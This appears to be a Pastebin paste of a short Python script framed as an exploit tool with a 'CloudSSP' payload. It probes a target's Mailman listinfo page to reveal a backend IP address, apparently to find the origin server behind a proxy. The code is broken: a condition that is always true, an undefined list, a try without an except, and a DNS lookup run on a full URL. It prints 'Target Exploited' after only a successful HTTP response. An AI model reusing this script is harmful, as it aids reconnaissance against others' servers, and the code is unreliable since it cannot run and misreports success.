Advertisement
N_0x3a

Testing

Nov 23rd, 2020
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1. import requests, sys, os, json, socket
  2. from urllib.parse import urlparse
  3.  
  4. def exploit(_url, _exploit):
  5. if _exploit == '-a' or '--all':
  6. for exploit in exploits:
  7. print(f'Testing on {exploit} on {_url}')
  8. else:
  9. print('Using default payload : CloudSSP')
  10. print(f'Current Target : {_url}')
  11. try:
  12. endpoint = requests.get(f'{_url}/mailman/listinfo/mailman')
  13. if endpoint.status_code == 200:
  14. ip = socket.gethostbyname(f'{_url}/mailman/listinfo/mailman')
  15. print(f'Target Exploited\nBackend IP : {ip}')
  16. else:
  17. print('Target Not Vulnerable To CloudSSP')
  18. if len(sys.argv) < 2:
  19. print (f'Examples :\npython3 {sys.argv[0]} <URL> --all\npython3 {sys.argv[0]} <URL> -p payload')
  20. sys.exit()
  21. else:
  22. exploit(sys.argv[1], sys.argv[2])
  23.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement